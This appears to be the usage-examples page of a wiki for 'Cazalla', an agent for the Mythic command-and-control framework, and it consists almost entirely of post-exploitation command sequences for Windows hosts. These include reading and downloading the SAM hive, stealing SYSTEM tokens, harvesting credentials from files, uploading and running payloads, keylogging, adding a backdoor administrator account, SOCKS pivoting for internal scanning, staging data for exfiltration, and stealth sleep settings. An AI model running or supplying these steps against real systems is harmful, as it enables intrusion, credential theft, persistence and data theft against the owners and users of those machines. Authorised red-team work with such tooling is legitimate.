Files
Angerona/documentation-payload/Cazalla/examples.md
T
marcos.luna 2fe9fa8254 wiki created
2025-11-06 12:23:49 +01:00

12 KiB

+++ title = "Examples" chapter = false weight = 10 pre = "5. " +++

Cazalla Usage Examples

This document provides practical examples and use cases for using Cazalla agent in real-world scenarios.

📋 Table of Contents


Basic Operations

Initial Reconnaissance

After deploying the agent, start with basic reconnaissance:

# Check current user context
whoami

# List current directory
pwd

# List files in current directory
ls

# List running processes
ps

# Check current directory contents
ls C:\Users

Navigate File System

# Change to user directory
cd C:\Users\Administrator

# List files
ls

# Check current directory
pwd

# Change to Desktop
cd Desktop

# List Desktop contents
ls

File System Operations

Reading Files

# Read a text file
cat C:\Users\Administrator\Desktop\notes.txt

# Read configuration file (may detect credentials)
cat C:\Windows\System32\config\sam

# Read hosts file
cat C:\Windows\System32\drivers\etc\hosts

# Read file with relative path (from current directory)
cd C:\Users\Administrator\Desktop
cat notes.txt

Downloading Files

# Download a small file
download C:\Users\Administrator\Desktop\important.txt

# Download a large file (chunked automatically)
download C:\Windows\System32\config\sam

# Download with relative path
cd C:\Users\Administrator\Desktop
download important.txt

Uploading Files

# Upload a file (requires file_id from Mythic)
# 1. Upload file to Mythic UI first
# 2. Get file_id from Files page
# 3. Execute upload command
upload <file_id> C:\Users\Administrator\Desktop\payload.exe

# Upload to directory (filename auto-appended)
upload <file_id> C:\Users\Administrator\Desktop

# Upload to staging directory
mkdir C:\temp\staging
upload <file_id> C:\temp\staging

File Management

# Copy a file
cp C:\Users\Administrator\Desktop\file.txt C:\temp\backup.txt

# Create directory
mkdir C:\temp\new_folder

# Delete file
rm C:\temp\old_file.txt

# Delete directory
rm C:\temp\old_folder

Process Management

Process Enumeration

# List all processes
ps

# View processes in Process Browser UI
# Navigate to PROCESSES tab in Mythic UI

Process Termination

# Kill a process by PID
kill 1234

# Kill from Process Browser UI
# Right-click process → Kill Process

Process Investigation

# List processes to find target
ps

# Identify process by name (look for explorer.exe, chrome.exe, etc.)
# Note the PID

# Kill the process
kill <PID>

Token Operations

Token Enumeration

# List all available tokens
list_tokens

# Look for high-value tokens (SYSTEM, Domain Admins, etc.)
# Note the PID of the process

Token Theft

# Steal token from a process
steal_token 1060

# Verify impersonation
whoami
# Output: NT AUTHORITY\SYSTEM

# Execute commands with stolen token
# (Commands will run with token's privileges if selected in Mythic UI)

Token Creation

# Create token with domain credentials
make_token DOMAIN username password

# Create token for local user
make_token "" Administrator P@ssw0rd123

# Verify token creation
whoami
# Output: DOMAIN\username

# Use token for tasking
# (Select token from dropdown in Mythic UI before issuing commands)

Token Reversion

# After completing privileged operations
rev2self

# Verify reversion
whoami
# Output: Original user context

Complete Token Workflow

# 1. Check current context
whoami
# Output: DESKTOP-ABC\localuser

# 2. List available tokens
list_tokens
# Find SYSTEM token (PID 1060)

# 3. Steal token
steal_token 1060

# 4. Verify impersonation
whoami
# Output: NT AUTHORITY\SYSTEM

# 5. Execute privileged operations
# (Commands run with SYSTEM privileges)

# 6. Revert to original token
rev2self

# 7. Verify reversion
whoami
# Output: DESKTOP-ABC\localuser

Network Tunneling

SOCKS Proxy Example

# Start SOCKS proxy
socks {"action":"start","port":7002}

# Configure proxychains on your machine
# Edit /etc/proxychains.conf:
[ProxyList]
socks5 <mythic_server_ip> 7002

# Use proxychains with tools
proxychains curl https://internal-server.local
proxychains nmap -sT 192.168.1.0/24
proxychains wget https://internal-server.local/file.txt

# Stop SOCKS proxy
socks {"action":"stop","port":7002}

Reverse Port Forwarding Example

# Start reverse port forward
# Agent listens on 8080, forwards to 192.168.1.100:80
rpfwd {"action":"start","port":8080,"remote_host":"192.168.1.100","remote_port":80}

# Connect to agent:8080 (from another machine)
curl http://<agent_ip>:8080
# Connection is forwarded to 192.168.1.100:80

# Stop reverse port forward
rpfwd {"action":"stop","port":8080}

Database Access via RPFWD

# Tunnel database connections
rpfwd {"action":"start","port":3306,"remote_host":"10.0.0.50","remote_port":3306}

# Connect to MySQL through agent (from another machine)
mysql -h <agent_ip> -P 3306 -u user -p

Credential Harvesting

Automatic Credential Detection

The cat command automatically detects and reports credentials:

# Read a file that may contain credentials
cat C:\Users\Administrator\Desktop\config.txt

# If credentials are found, they are automatically:
# - Detected in file content
# - Reported to Mythic's credential store
# - Visible in CREDENTIALS tab

# Example file content that triggers detection:
# username:password
# domain\username:password
# username@domain.com:password
# password=secret123
# http://user:pass@host.com
# aad3b435b51404ee:hash...

Credential Extraction Workflow

# 1. Find configuration files
cd C:\Users\Administrator
ls

# 2. Read configuration files
cat .config
cat credentials.txt
cat config.ini

# 3. Check Credentials tab in Mythic UI
# All discovered credentials appear automatically

# 4. Use credentials for token creation
make_token DOMAIN username password

Common Workflows

Initial System Reconnaissance

# 1. Check current context
whoami
pwd

# 2. List processes
ps

# 3. Navigate user directory
cd C:\Users
ls

# 4. Check Desktop for interesting files
cd Administrator\Desktop
ls

# 5. Read interesting files
cat notes.txt
cat config.txt

Privilege Escalation Workflow

# 1. List available tokens
list_tokens

# 2. Identify high-value token (SYSTEM, Domain Admin, etc.)
# Note the PID

# 3. Steal token
steal_token <PID>

# 4. Verify impersonation
whoami

# 5. Execute privileged operations
# (Commands run with stolen token's privileges)

# 6. Revert to original token
rev2self

Data Exfiltration Workflow

# 1. Navigate to target directory
cd C:\Users\Administrator\Documents

# 2. List files
ls

# 3. Download important files
download important_document.pdf
download database_backup.sql

# 4. Create staging directory
mkdir C:\temp\exfil

# 5. Copy files to staging
cp important_document.pdf C:\temp\exfil
cp database_backup.sql C:\temp\exfil

# 6. Download from staging
cd C:\temp\exfil
download important_document.pdf
download database_backup.sql

# 7. Clean up staging
cd C:\temp
rm exfil

Lateral Movement via SOCKS

# 1. Start SOCKS proxy
socks {"action":"start","port":7002}

# 2. Configure proxychains on your machine
# Edit /etc/proxychains.conf:
[ProxyList]
socks5 <mythic_server_ip> 7002

# 3. Use proxychains for lateral movement
proxychains smbclient //internal-server.local/share -U user
proxychains rdesktop internal-server.local
proxychains ssh user@internal-server.local

File Upload and Execution

# 1. Upload payload to staging directory
mkdir C:\temp\staging
upload <file_id> C:\temp\staging\payload.exe

# 2. Verify upload
ls C:\temp\staging

# 3. Execute payload (if needed)
shell C:\temp\staging\payload.exe

# 4. Clean up
rm C:\temp\staging\payload.exe

Screenshot Capture

# Capture screenshot
screenshot

# Screenshot is automatically uploaded to Mythic
# View in Files tab or Screenshot UI

Keylogging Session

# 1. Start keylogger
keylog_start
# WARNING: This has CRITICAL OPSEC RISK
# Always requires lead operator approval

# 2. Let keylogger run for desired duration
# Keystrokes are automatically captured and sent to Mythic

# 3. View keylogs in Mythic UI
# Navigate to KEYLOGS tab

# 4. Stop keylogger
keylog_stop

Complete Post-Exploitation Workflow

# 1. Initial reconnaissance
whoami
pwd
ps
ls

# 2. Navigate user directory
cd C:\Users\Administrator
ls Desktop

# 3. Read interesting files
cat Desktop\notes.txt
cat Desktop\config.txt

# 4. Download important files
download Desktop\important.pdf

# 5. Token enumeration
list_tokens

# 6. Steal high-value token
steal_token <PID>

# 7. Verify impersonation
whoami

# 8. Execute privileged operations
# (Commands run with stolen token's privileges)

# 9. Capture screenshot
screenshot

# 10. Revert token
rev2self

# 11. Adjust sleep for stealth
sleep {"seconds":60,"jitter":20}

Advanced Examples

Multi-Step Privilege Escalation

# 1. List tokens to find SYSTEM process
list_tokens

# 2. Steal SYSTEM token
steal_token <SYSTEM_PID>

# 3. Verify SYSTEM context
whoami
# Output: NT AUTHORITY\SYSTEM

# 4. Access protected files
cat C:\Windows\System32\config\sam
download C:\Windows\System32\config\sam

# 5. Create new user with SYSTEM privileges
shell net user hacker P@ssw0rd123 /add
shell net localgroup administrators hacker /add

# 6. Revert to original token
rev2self

Network Pivoting via SOCKS

# 1. Start SOCKS proxy
socks {"action":"start","port":7002}

# 2. Configure proxychains
# Edit /etc/proxychains.conf:
[ProxyList]
socks5 <mythic_server_ip> 7002

# 3. Scan internal network
proxychains nmap -sT 192.168.1.0/24

# 4. Access internal services
proxychains curl http://192.168.1.100
proxychains smbclient //192.168.1.100/share -U user

# 5. Stop SOCKS proxy
socks {"action":"stop","port":7002}

Credential Extraction and Lateral Movement

# 1. Read configuration files
cat C:\Users\Administrator\Desktop\config.txt
# Credentials automatically detected and reported

# 2. Check Credentials tab in Mythic UI
# Find extracted credentials

# 3. Create token with extracted credentials
make_token DOMAIN username password

# 4. Verify token creation
whoami
# Output: DOMAIN\username

# 5. Use token for lateral movement
# (Commands run with domain credentials if token selected)

Tips and Best Practices

Use Built-in Commands

Avoid:

shell whoami
shell tasklist
shell dir

Prefer:

whoami
ps
ls

Use Relative Paths

# Change to target directory first
cd C:\Users\Administrator\Desktop

# Then use relative paths
ls
cat notes.txt
download important.pdf

Monitor Artifacts

After executing commands, always check the Artifacts tab in Mythic UI to see what forensic evidence was created.

Review OPSEC Warnings

Always read and understand OPSEC popup messages before approving commands.

Use Appropriate Sleep Intervals

# Initial deployment (stealth)
sleep {"seconds":60,"jitter":30}

# Interactive operations
sleep {"seconds":10,"jitter":10}

# Stealth mode
sleep {"seconds":120,"jitter":40}


Last Updated: 2024